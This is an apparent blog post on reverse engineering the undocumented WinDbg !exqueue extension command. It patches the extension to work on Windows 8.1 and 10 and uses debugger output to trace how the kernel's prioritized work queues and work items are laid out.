Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i Background WorkQueue
Debuggers\x64\winxp\kdexts.dll: **** Critical WorkQueue
Debuggers\x64\winxp\kdexts.dll: **** Delayed WorkQueue
Debuggers\x64\winxp\kdexts.dll: **** HyperCritical WorkQueue
Debuggers\x64\winxp\kdexts.dll: ExWorkQueue
...

With firing up IDA, I easily found that there was an undocumented (*1) command named !exqueue and it was exactly what I wanted.

kd> !kdexts.help
...
exqueue [flags]              - Dump the ExWorkerQueues
...

Fixing an Issue

The issue was that this commend did not work against Windows 8.1 and 10 targets.

kd> !exqueue
GetGlobalValue: unable to get NT!KeNumberNodes type size

So, I started to debug and reverse engineer kdexts.dll a bit more, then noticed that Windbg was failing to read the nt!KeNumberNodes, which is always 1 unless you use NUMA, and a solution was just patching code to set 1 to eax.

.text:00000001801161DA   lea rcx, aNtKenumbernode ; "NT!KeNumberNodes"
.text:00000001801161E1   call read_global_variable
.text:00000001801161E1   mov eax, 1
.text:00000001801161E6   mov rbx, cs:qword_1801A8500
.text:00000001801161ED   mov rcx, rbx
.text:00000001801161F0   mov rbp, rax

Here is an output:

kd> !exqueue

**** NUMA Node 0 - ( Threads: 7/4096 ) ****

...
 -> Priority 12 - ( Concurrency: 0/2 )
...
    ExWorkItem (ffffe00084a91160) 
      Routine ListWorkItems!<lambda_bae...> (fffff800746e5290) 
      Parameter (fffff800746e7220)
    ExWorkItem (ffffe0008105ff10) 
      Routine dxgkrnl!DxgkpProcessTerminationListThread (...) 
      Parameter (ffffe0008105fbb0)
    WdfWorkItem (ffffe00082b035a0) 
      Routine cdrom!IoctlWorkItemRoutine (fffff80072c6e900)
    ExWorkItem (fffff8006b8ff0c0) 
      Routine nt!CmpDelayDerefKCBWorker (fffff8006ba5d008) 
      Parameter (0000000000000000)
...
 -> Priority 31 - ( Concurrency: 0/2 )

 -> Associated Threads

THREAD ffffe000828fe040  Cid 0004.0170  Teb: 0000000000000000 Win32Thread: 0000000000000000 WAIT
...


Re-implementing the Command


My goal was, however, not to use the command; the goal was to know how it works, so I reverse engineered !exqueue more to learn the details of the work queues and how to enumerate items in them by hand.

Analyzing Windbg commands is often a lot easier than analyzing the kernel file because it contains a lot of strings that help you know what structures are dealt with.
Image1: Strings in code of !enqueue
This time was not exception. Basically, for Windows 8 and later, the command gets a NUMA node (nt!_ENODE) structure containing a reference to the work queues with looking at nt!KeNumberNodes and nt!KeNodeBlock first. Here, I follow the same procedure as !exqueue using basic commands.

There is only one NUMA node block as I do not configure NUMA.

kd> dw nt!KeNumberNodes
fffff803`f5774008  0001

kd> dps nt!KeNodeBlock
fffff803`f576c800  fffff803`f56c3240 nt!ExNode0
fffff803`f576c808  00000000`00000000
fffff803`f576c810  00000000`00000000

Then, the command refers to the _ENODE.ExWorkQueue.WorkPriQueue.EntryListHead field, which is an array of the prioritized work queues.

kd> dt nt!_ENODE ExWorkQueue.WorkPriQueue. fffff803`f56c3240
   +0x0c0 ExWorkQueues              : [8]
   +0x100 ExWorkQueue               :
      +0x000 WorkPriQueue              :
         +0x000 Header                    : _DISPATCHER_HEADER
         +0x018 EntryListHead             : [32] _LIST_ENTRY [
                                               0xfffff803`f56c3358 -
                                               0xfffff803`f56c3358 ]
         +0x218 CurrentCount              : [32] 0n0
         +0x298 MaximumCount              : 4
         +0x2a0 ThreadListHead            : _LIST_ENTRY [
                                               0xffffe000`eb78f248 -
                                               0xffffe000`ecd89a88 ]

Each element of the EntryListHead is a list of work items (nt!_WORK_QUEUE_ITEM), and the array represents priorities of each list; in other words, there are 32 work queues and each manages items with priority 0 (the lowest) to 31 (the highest) respectively.

kd> dt nt!_ENODE -a ExWorkQueue.WorkPriQueue.EntryListHead fffff803`f56c3240
          ...
          [12] _LIST_ENTRY [ 0xffffe000`846f62f0 - 0xffffe000`82bea2c0 ]
          ...

kd> dt nt!_WORK_QUEUE_ITEM 0xffffe000`846f62f0
   +0x000 List             : _LIST_ENTRY [ 0xffffe000`8305d130 -
                                           0xfffff800`6b8ca418 ]
   +0x010 WorkerRoutine    : 0xfffff800`746dd290     
                             void  ListWorkItems!<lambda_7d382b...>+0
   +0x018 Parameter        : 0xfffff800`746df220 Void

The !exqueue command shows the contents of the lists as well as associated worker threads referred by the ThreadListHead field.

All you can do, I can do :) I wrote a driver that dumps all items in each work queue to confirm that the above analysis was correct. Note that because this driver is just PoC, it works only on the 64 bit version of Win8.1 and Win10.

https://github.com/tandasat/ListWorkItems

Conclusion

Analyzing Windbg commands often gives you good understanding of the Windows kernel with a less effort than analyzing the kernel file, and even if you do not find a helpful command at a glance, there may be an undocumented command which you can reverse engineer to unveil the Windows internals.

Side Notes

  1. It seems that !exqueue used to be documented and then abandoned for some reasons. I found a description about it on a help file came with the Windbg version 6.11.001.404.
  • The ExWorkQueues field in the _ENODE also holds pointers to the WorkPriQueue structures. It is likely that the structures are allocated for each processor but only one associated with the processor 0 is really used. 
  • Apparently, an item does not go to the queue if any of worker threads is in a wait state (ie, waiting for an item) when the item is being queued. I guess the item is associated with a thread without being stored in the queue for performance in this case. For this reason, the command does not show the first item when multiple items are queued at once.